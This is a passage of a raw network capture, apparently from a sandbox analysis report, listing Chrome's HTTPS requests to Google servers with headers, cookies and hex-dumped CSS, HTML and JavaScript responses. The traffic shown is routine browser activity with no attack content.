                                                                                                                                                                                                                                                                                          Data Ascii: .MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC443INData Raw: 6e 66 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 59 70 63 44 6e 66 2e 48 47 31 64 76 64 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 48 47 31 64 76 64 3e 2a 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 7d 2e 57 74 56 35 6e 64 20 2e 59 70 63 44 6e 66 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 38 70 78 7d 2e 5a 74 30 61 35 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 7d 2e 47 5a 6e 51 71 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 33 70 78 7d 2e 45 70 50 59 4c 64 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 45 70 50 59 4c 64 2c 2e 43 42 38 6e 44 65 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74
                                                                                                                                                                                                                                                                                          Data Ascii: nf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor:default
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC665INData Raw: 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 20 38 70 78 20 63 65 6e 74 65 72 7d 2e 5a 74 30 61 35 65 2e 43 42 38 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 6d 61 74 65 72 69 61 6c 2f 73 79 73 74 65 6d 2f 31 78 2f 64 6f 6e 65 5f 62 6c 61 63 6b 5f 31 36 64 70 2e 70 6e 67 29 7d 40 6d 65 64 69 61 20 28 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 3a 61 63 74 69 76 65 29 7b 2e 5a 74 30 61 35 65 2e 43 42 38 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 69 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: nDe{background:no-repeat left 8px center}.Zt0a5e.CB8nDe{background-image:url(https://ssl.gstatic.com/images/icons/material/system/1x/done_black_16dp.png)}@media (forced-colors:active){.Zt0a5e.CB8nDe{background-image:url(https://ssl.gstatic.com/images/icon


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          50192.168.2.749804142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1295OUTGET /client_204?cs=1&opi=89978449 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1163INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-yF9i56QpuhwQi4dkHpw_nw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:22 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Set-Cookie: NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w; expires=Sat, 29-Mar-2025 14:41:18 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          51192.168.2.749810142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC2779OUTGET /async/hpba?vet=10ahUKEwiPz-fGreOIAxUsSfEDHZ8eAfMQj-0KCBU..i&ei=CsT2Zo-iIaySxc8Pn72EmA8&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.dIEp8Iy3TZo.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.8JyeNrzotDo.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAAEAAAAAAAAAAoAHYSAACMAAA2ACAAAAAAAAQAAAMAAAAAAEACAAAABMACAAAAAAAEACASAABAEQAAAACBECAAAAEUQAgQgAQIFEEoBAAAAAYAAAgBYIBhAIIKAEYBAgAAAAAAIEAEAAAARQACBADoIRAABgJhAgAgBPQABAAAAIAAAAJAAAAYAANkAAIAAAAAAADIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAQAEAAAAAAAAAAAAAAAAAAAAE%2Fbr%3D1%2Frs%3DACT90oGeXue4vCo29BBNLxd3Hctkci5Jig,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3 [TRUNCATED]
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1036INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Version: 677663421
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:22 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC47INData Raw: 32 39 0d 0a 29 5d 7d 27 0a 32 31 3b 5b 22 45 73 54 32 5a 73 36 51 4b 4b 66 67 69 2d 67 50 71 76 4f 4b 43 41 22 2c 22 32 30 38 35 22 5d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 29)]}'21;["EsT2Zs6QKKfgi-gPqvOKCA","2085"]
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC50INData Raw: 32 63 0d 0a 63 3b 5b 32 2c 6e 75 6c 6c 2c 22 30 22 5d 31 62 3b 3c 64 69 76 20 6a 73 6e 61 6d 65 3d 22 4e 6c 6c 30 6e 65 22 3e 3c 2f 64 69 76 3e 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2cc;[2,null,"0"]1b;<div jsname="Nll0ne"></div>
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC22INData Raw: 31 30 0d 0a 63 3b 5b 39 2c 6e 75 6c 6c 2c 22 30 22 5d 30 3b 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 10c;[9,null,"0"]0;
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          52192.168.2.749808142.250.181.2384435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC756OUTGET /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC270INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:22 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                          Content-Length: 1555
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1120INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC435INData Raw: 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e
                                                                                                                                                                                                                                                                                          Data Ascii: pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          53192.168.2.749811142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1820OUTGET /xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=0/dg=0/br=1/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 24979
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 06:23:18 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 06:23:18 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 27 Sep 2024 04:59:45 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Age: 29884
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC561INData Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 4c 24 63 3d 5f 2e 45 64 28 22 50 31 30 4f 77 66 22 2c 5b 5f 2e 67 71 5d 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 50 31 30 4f 77 66 22 29 3b 0a 76 61 72 20 47 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 41 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 74 68 69 73 2e 6b 61 3d 74 68 69 73 2e 67 65 74 44 61 74 61 28 22 63 6d 65 70 22 29 2e 4b 62 28 29 3b 74 68 69 73 2e 4f 62 3d 61 2e 73 65 72 76 69 63 65 2e 4f 62 3b 74 68 69 73 2e 64 61 74 61 3d 61 2e 54 64 2e 74 64 61 7d 3b 5f 2e 43 28
